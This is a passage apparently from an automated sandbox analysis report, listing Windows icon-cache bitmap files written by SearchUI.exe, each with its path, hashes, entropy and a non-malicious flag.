                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.0930937878156
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.486966268894466
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.7889759263929514
                      Encrypted:false
                      SSDEEP:384:MykHHNBh573phU/+uxbqAsKMxozHHyxGZ+xbTJ4GLL:0N9547PMxoWxQ+z4
                      MD5:5E8789E07E5C0545251DA36BD0C8E4A5
                      SHA1:75A00B8758EC1B080C47DAE3452977E4A61F0167
                      SHA-256:5682A3FF1985EDD22549E7821899C00286687562C768C262DE1D2A542B1884FF
                      SHA-512:3A415A469A0C2F833F93A64C5025388BC83513502CDAA46F0091D11006E48EB67215FAC01953BB02C5F304D21E0F487DB1085260F0F603C554C4B19434E137CE
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.793507436168296
                      Encrypted:false
                      SSDEEP:384:mUjP2WuLEORPr0L34K6J3hD9cOBmEk5osHUOMaMj9lqA7zjI8bkjXFgfeO1WDx:Ej0bG3hD9ZB/sHxS9lqszjI8bEXGfBS
                      MD5:AAA4819053434A9053ECC052BF9333FE
                      SHA1:9B1FAC342A7584C594FEC050F93CAB88EFA1D60F
                      SHA-256:B640E25EEF2B6A66040EF12DFD197A11FBD0FD85EA03C9E26308E7BDE48CDE31
                      SHA-512:B0EF50FD798AD5C8FD985969674AB893843E88DCC4B53F812F4000DF4F3B24F9B99DD6AE5A1A88FD93822662FF8383AAAB7D28A2E86B3943052323EBE004B859
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.001928919915705
                      Encrypted:false
                      SSDEEP:384:v1PefEMJQ6iy3mJKc+kgeonnN8R7WSBXT6YpHK7ou9YSzCrXNR2NtEx1hXQ:vRbiviy3mJ+e28PBj6YpqsdACBLx11Q
                      MD5:7689C30D53AF0DC638A76CDAC2B6755C
                      SHA1:EE74AE57C6C4867783C282B46CCE4AAEE6FCD5C3
                      SHA-256:A05BCDCFA0FDC148FC7EADAA891E11D3646B84B04F793782B7257EDD77015E35
                      SHA-512:6840A48E5725501B37455F650CABFFC17086453B6D70F943FF379F2B5B1FF9D1A72DA8DD27083C082C3ABCAACA3CBCB36DA2C7005D08811CF94B45E88392F38B
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.954813670123038
                      Encrypted:false
                      SSDEEP:768:fzheYQ/OnxvOSp4eCYapPYJ5OUVmdCZh3qZACZc7:fvQ/Onxvzp4eCvwOQ7
                      MD5:6F0D8710C462B5955D9D16745BDB1BFD
                      SHA1:ED0545934A28799EF27DDDCC0439D05DC40C47AC
                      SHA-256:342F29784A85F25EC119D85E39267EC57A4C803FBC099F6C5CEB7761F8896CFD
                      SHA-512:404085314A3CF37E8E66AECD314D63EA9711D05C1ECB714D531126E61B7BB9929E59E4A42CB736DDADE1AC416D76477881D18B428BFD603FEDE3E9EEB7B6F8CB
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233087509489573
                      Encrypted:false
                      SSDEEP:384:xcpYx19SVVJogXE+4dpImMEpPvBZLVVPwWBRemQkt:P9SdoB+4dkEpBZsWLemQ
                      MD5:F6A5FFE5754175D3603C3A77DCFECA6B
                      SHA1:DACD500AEEF9DD69B87FEAE7521899040E7DF1D9
                      SHA-256:FAB3529F4A4DF98271FA2F6A7860A28FDC30215144B7EEFBAF6D424A2847D035
                      SHA-512:66EC46041F1FE20203CDA7A4D68B61D2E5BCDD09A36EE8171EFA53FE92A9E6E023C5A254A4C43C110A99749829D7B99613F8D13DFB4C42656097CB8D224A531E
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8718684725674635
                      Encrypted:false
                      SSDEEP:384:Ib/l8edt7HWlER6Ji5/nCY/rA7vAuAlRrTlG9+LyynFiOUzvw:u/XdhWly/n/sDAuG8yi
                      MD5:7279E4431C96C1030F6CCEFB5FCE7CF3
                      SHA1:E6D0C93D63C00D14E2F40F5FDBF6C3FDC3487442
                      SHA-256:64472AF7E48D716D113B1C8A8241EAA67737B21E29ABD62B4A0BFB485363AE3A
                      SHA-512:DB7FEBD66F65A486B1B77F13D8B32787C9D04E2B07003CD0DC90F4531AFE70132ED9F165AB55C012B60857BD4E6F8FE2E78F7FF132BF64A95159D7138E5DF53D
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.803071088933566
                      Encrypted:false
                      SSDEEP:768:ZgvE2waUUebe/DdqJ+n2RCpCUGXOzwy/Nt8Bj0Y:ZgsDTpXOzlNt8Bj0Y
                      MD5:7794DF1F7EA502F8B5A7AFE7458DCBD4
                      SHA1:179F413597C837600E87609DE63AE9112E3E7199
                      SHA-256:75F6713E1AE6F0CAA52D0B3957114D7653E2E002B33E1C6B173F6A584EAD94E4
                      SHA-512:2A77656D9201C8684315C1FE8693FEE206B13D072FD4164491B7A4C5FC46A3BA78216200C48B044BAD221C27423394529173F8D84A5A38DA7343231D0F7D9FBC
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.0343458593902253
                      Encrypted:false
                      SSDEEP:192:CiQAgksACxX5PGbXNbwiaWBr+XVNmKzyaoAhsAdV0LvQe:PQAgTxXadbvaWBEVlyHAhso2LvF
                      MD5:5E2DA008F38C7AD813D9FE8E669DDDD6
                      SHA1:3F4ED852167CFB251CCE13BE4906A0CBEA58F021
                      SHA-256:0CF904A532AC487F6B4C080FD01406529AD26AE559128B0AFF170F389C278C28
                      SHA-512:8D295AF13FA38384923E0DB043EF7196AE3CDDDC9DC1E765217494461C6C6F24704EB984985C45159CAE06E81CA857C4F406B1EC80BC9C8FBCCAD535A1F77D72
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.854670415110173
                      Encrypted:false
                      SSDEEP:384:HxLApd61dIMrSfSWSoXX8JAJwzzglzsJwgzz7b1J8Y:HVAe1+5ezzglzsJfzztJ8Y
                      MD5:988D8F7A55D7A70D764DFA515A4EC6CD
                      SHA1:0935B33593AE55A70833624FBB1EDD7208391FF7
                      SHA-256:DB1DDDDF683C53435B987F49F5F5B3262899451C634298BAFB3A0B122CEAA62A
                      SHA-512:3EA0E33B836E1CD0B8D034F1E4D31CFBCCAD59332CDFD0CFBF08005C32204FF930C5578350FD1AC111F109B1AE38D3621394227CBB1DA11D64AF4E46735789C8
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.7417273362835175
                      Encrypted:false
                      SSDEEP:384:UWgzpLFyyUkzIO0hARry+mGEtZMtUW4eLqpM3BE1+gJnlBxdESAUieo+1kP:UDGkzIOjLEA0tlOSAI7kP
                      MD5:309ECC1BE4C82F8F37D11BE3F08F8091
                      SHA1:DFCDAC75DFD12C3A3829472E37FD01DAABBBB0EB
                      SHA-256:99E3F8231733B8E4D7751B9175A27F0952D2480065BBF710666920AFB83BF575
                      SHA-512:3D5D7753A2D25B329F7CA10A6B5ACE805AC0E79BB02F43703AED74CF69959458E28922C7433C5FDA64C389CFC43704E94CCB77F9506D91BCA8727F376AB4ED9A
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Adobe_Acrobat Reader DC_Reader_AcroRd32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.945101500771214
                      Encrypted:false
                      SSDEEP:768:bgj/aOOOOOOOOTOOOOOOOOOOOOOOOOOOOOOOOOO9OOOOOOOOOOGOwOOOaCCCCCCe:S/
                      MD5:9A56ADE8534E9D83C3E8E49B023544C2
                      SHA1:938CA452EED1EC09B515E915579791E7269DD312
                      SHA-256:8DC2EA05A2A6B583F7C86394C76EC16994C05CC6068FE3368D824BB351670D6E
                      SHA-512:9E7FCE44A3CE54385C7B21E8D2CA274C335B29F3D25F043B2B0842EF8917C24E8F50677586FC0F0F973BEBC74FC6AC15EDC70E3601A4E86109F44CE24E3DDC68
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_ActiveX_VBScript
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.9474304309097916
                      Encrypted:false
                      SSDEEP:48:jDlmj1hraax2DvfG+ohTrNAg4eBDAudJ4hKO2I7dQOggBYiiqD1yB72G6nBRz9iz:jDlU1hUol9onbdaa/aarIkb
                      MD5:BAD093419BE1135CFE9694EA77088C78
                      SHA1:76204C7CA72CF666ADD9C9931389D635C82E8AF0
                      SHA-256:136808AF50EE73DF9BEFD76F7ACA21765782565B0095227C5A287F3BE0B5EF3C
                      SHA-512:3B5CB7F80D7CBC557B5A32A995CD607257AC8E56AF935CE6F64C54BA1F311A65EF00C69C69047B6EB7BB678C2B1BC0A3C37548AEF417EA49E414E1A34BCF651D
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1096298036180372
                      Encrypted:false
                      SSDEEP:768:Xmmmmmmmmmmmmmmmmmmmmmmmmmmhh666ef6S2GSS2GSR9xNh4bX78XEq5P/t4p81:W
                      MD5:A62D519BE58C4EC079CD825E04C1F4BF
                      SHA1:91C59FF74E1911D942CDB7A68EBBA42F10DC3510
                      SHA-256:9AF30E079CC36BDF17FB5FFFEBBE68B2275616F9513B07E99F15F7065A2D99C6
                      SHA-512:637A0DCED1A940AF17C47ABCDF30DC1A2AB2C1A1F70B9199789670398E87D2C9AD445F82E05FD1EA84CCCFB62D25C8253218426C1FD9784B14DD5C7BAE881B69
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1096298036180372
                      Encrypted:false
                      SSDEEP:768:Xmmmmmmmmmmmmmmmmmmmmmmmmmmhh666ef6S2GSS2GSR9xNh4bX78XEq5P/t4p81:W
                      MD5:A62D519BE58C4EC079CD825E04C1F4BF
                      SHA1:91C59FF74E1911D942CDB7A68EBBA42F10DC3510
                      SHA-256:9AF30E079CC36BDF17FB5FFFEBBE68B2275616F9513B07E99F15F7065A2D99C6
                      SHA-512:637A0DCED1A940AF17C47ABCDF30DC1A2AB2C1A1F70B9199789670398E87D2C9AD445F82E05FD1EA84CCCFB62D25C8253218426C1FD9784B14DD5C7BAE881B69
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.2553718606106505
                      Encrypted:false
                      SSDEEP:768:mb4daw1rifFiUq1pcWpeFpQnfRpfjCMZHTu7954CM:WsC9
                      MD5:3B6A6056910488C2F2D94B954B66C6F9
                      SHA1:20D828CB53770F094D149754BFBD789E943033DB
                      SHA-256:F5BC1C0213F8DC696862E7BE83CA71C1FEC3A62EBC979E8D33D7613E49AEDFC8
                      SHA-512:49607F2B0C7AEBE9F9BBD01B61BBF6D4A1BCBB8B500BC7C50CB8BD48E3880FABD6FEDF8BDFE6797701D4637850211D66853F01063366DC0E717214AC6925D1EA
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.2553718606106505
                      Encrypted:false
                      SSDEEP:768:mb4daw1rifFiUq1pcWpeFpQnfRpfjCMZHTu7954CM:WsC9
                      MD5:3B6A6056910488C2F2D94B954B66C6F9
                      SHA1:20D828CB53770F094D149754BFBD789E943033DB
                      SHA-256:F5BC1C0213F8DC696862E7BE83CA71C1FEC3A62EBC979E8D33D7613E49AEDFC8
                      SHA-512:49607F2B0C7AEBE9F9BBD01B61BBF6D4A1BCBB8B500BC7C50CB8BD48E3880FABD6FEDF8BDFE6797701D4637850211D66853F01063366DC0E717214AC6925D1EA
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.5907295044118275
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmO0mTGJD9w2KUk/hdJVdNitCef3WpWI35nlRJgTvLDl:pb34j
                      MD5:682F8BB506C58A1E9DFCA38C5EBB8B0B
                      SHA1:A88B8237260041A47057741111278BC2E7EF32D7
                      SHA-256:5F762791DC72986698336D13A708F04AC06D90A1C5B69D828196B1C53C607554
                      SHA-512:8CD54E9EA179123839B0C0755B6611236DE81FBC2C7FE68A87477451A36B9482B1E5686DEE57932E269561DE420206D2B0BAF3EB12C98226A540AC3091CC98C8
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre1_8_0_231_bin_javacpl_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233098316757873
                      Encrypted:false
                      SSDEEP:192:Lph8tFOXKFOgFOBODOR5OIO5AOYj0T3lYERVSnnnn8pF0EIGcrx4+WiNLN2+xpSK:LT10TjVSnnnn8pc5b4
                      MD5:3CCC6610ECF9EB036FC50FDA1F781D21
                      SHA1:DE7DB115B3BD1B926AE0B2A795E7D0FEAC621851
                      SHA-256:2192613BBCF96DD824A813B59C598C486EA713A05C82FB1184EB955BC3B84839
                      SHA-512:AA3A6D68415FC17695A8DC35271617834A84B3485AF974CF34F2FF2A065AB6217DB4A19E08ABD22330DEA9D9A44963E0AA70FEDA061DB2CA6C0C29B2F4C6CA42
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.159960702416083
                      Encrypted:false
                      SSDEEP:768:vKr/VVPqdA9R222vZ5jYp3vlD5hiLYhEDXfx:vXU5ZEDXfx
                      MD5:94B56D65A8B7F7253AEACAC345D4B096
